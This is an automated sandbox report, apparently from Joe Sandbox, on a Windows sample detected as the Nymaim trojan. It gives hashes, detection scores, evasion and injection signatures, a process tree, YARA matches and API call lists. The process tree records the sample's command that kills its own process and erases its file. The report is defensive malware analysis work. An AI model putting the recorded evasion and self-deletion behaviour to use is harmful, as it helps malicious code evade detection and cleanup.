Edit tour

Windows Analysis Report
qjrOWCCE58

Overview

General Information

Sample Name:	qjrOWCCE58 (renamed file extension from none to exe)
Analysis ID:	620693
MD5:	732132623989caae367e0878298b7e9b
SHA1:	e493be600aa8ecf7384ac3f23454daf6fdd1821d
SHA256:	32f431ba791fcd1f53e53b26447c9dbf59983549f567bac43ea9578b98de4ca8
Tags:	32exetrojan
Infos:

Detection

Nymaim

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Nymaim

Multi AV Scanner detection for submitted file

Machine Learning detection for sample

Uses 32bit PE files

One or more processes crash

PE file contains strange resources

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Checks if the current process is being debugged

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Uses taskkill to terminate processes

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to detect sandboxes (foreground window change detection)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

PE file contains executable resources (Code or Archives)

Creates a process in suspended mode (likely to inject code)

Enables debug privileges

Classification

Process Tree

System is w10x64

qjrOWCCE58.exe (PID: 1592 cmdline: "C:\Users\user\Desktop\qjrOWCCE58.exe" MD5: 732132623989CAAE367E0878298B7E9B)

WerFault.exe (PID: 4856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 656 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 772 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 3152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 796 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4856 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 900 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 6220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 908 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 6408 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 916 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cmd.exe (PID: 6492 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "qjrOWCCE58.exe" /f & erase "C:\Users\user\Desktop\qjrOWCCE58.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6612 cmdline: taskkill /im "qjrOWCCE58.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.269341375.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.283327894.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.262759789.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.253715249.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.280137430.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.253175312.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.302456596.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.291073585.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.283828611.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.263480015.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.284150109.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.301360286.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.302642354.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000003.250452760.0000000000860000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.254142123.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.292136739.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.301881203.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.269598460.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.262441622.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.263212749.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.309005504.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.309602192.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.309769483.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.291503648.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.270183524.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.292619266.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.252534472.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.269963050.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.309168636.0000000000820000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
Click to see the 26 entries

Unpacked PEs

Source	Rule	Description	Author
0.0.qjrOWCCE58.exe.400000.11.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.21.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.5.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.2.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.16.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.20.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.6.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.2.qjrOWCCE58.exe.400000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.3.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.12.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.14.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.12.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.27.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.14.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.1.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.24.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.15.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.22.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.13.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.4.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.4.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.8.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.17.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.5.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.20.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.21.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.19.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.7.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.9.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.28.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.23.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.27.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.8.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.2.qjrOWCCE58.exe.820e67.1.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.3.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.2.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.24.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.23.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.6.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.26.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.7.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.18.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.11.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.13.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.3.qjrOWCCE58.exe.860000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.25.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.10.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.10.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.25.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.3.qjrOWCCE58.exe.860000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.18.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.19.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.22.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.2.qjrOWCCE58.exe.400000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.9.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.2.qjrOWCCE58.exe.820e67.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.17.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.26.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.400000.15.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.16.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.qjrOWCCE58.exe.820e67.28.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
Click to see the 58 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: qjrOWCCE58.exe	Virustotal: Detection: 33%			Perma Link
Source: qjrOWCCE58.exe	ReversingLabs: Detection: 50%

Machine Learning detection for sample

Source: qjrOWCCE58.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00403050 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,		0_2_00403050
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_008232B7 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,		0_2_008232B7

Source: qjrOWCCE58.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\ciyicu.pdb source: qjrOWCCE58.exe
Source:	Binary string: *'9C:\ciyicu.pdb source: qjrOWCCE58.exe

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00403D70 Sleep,Sleep,FindFirstFileA,FindNextFileA,Sleep,FindNextFileA,FindClose,Sleep,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,	0_2_00403D70
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_004225FD FindFirstFileExW,	0_2_004225FD
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00842864 FindFirstFileExW,	0_2_00842864
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00823FD7 FindFirstFileA,FindClose,GetTempPathA,__Init_thread_footer,GetTempPathA,__Init_thread_footer,GetTempPathA,__Init_thread_footer,GetTempPathA,__Init_thread_footer,	0_2_00823FD7

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Code function: 0_2_00401420 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,

0_2_00401420

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.820e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.qjrOWCCE58.exe.860000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.qjrOWCCE58.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.qjrOWCCE58.exe.820e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.qjrOWCCE58.exe.820e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.323501836.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.269341375.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.283327894.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.262759789.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253715249.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280137430.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253175312.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.302456596.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.291073585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.283828611.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.263480015.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284150109.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.301360286.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.302642354.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250452760.0000000000860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254142123.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292136739.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.301881203.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.269598460.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.262441622.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.263212749.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309005504.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309602192.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.323104838.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309769483.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.291503648.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270183524.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292619266.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252534472.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.269963050.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.309168636.0000000000820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: qjrOWCCE58.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\qjrOWCCE58.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1592 -s 656

Source: qjrOWCCE58.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qjrOWCCE58.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qjrOWCCE58.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: qjrOWCCE58.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00407FB0	0_2_00407FB0
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00404800	0_2_00404800
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00402800	0_2_00402800
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00425020	0_2_00425020
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_004138A3	0_2_004138A3
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00404120	0_2_00404120
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0040F240	0_2_0040F240
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00413AD5	0_2_00413AD5
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_0042936A	0_2_0042936A
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00420B79	0_2_00420B79
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00420458	0_2_00420458
Source: C:\Users\user\Desktop\qjrOWCCE58.exe	Code function: 0_2_00417CE0	0_2_00417CE0
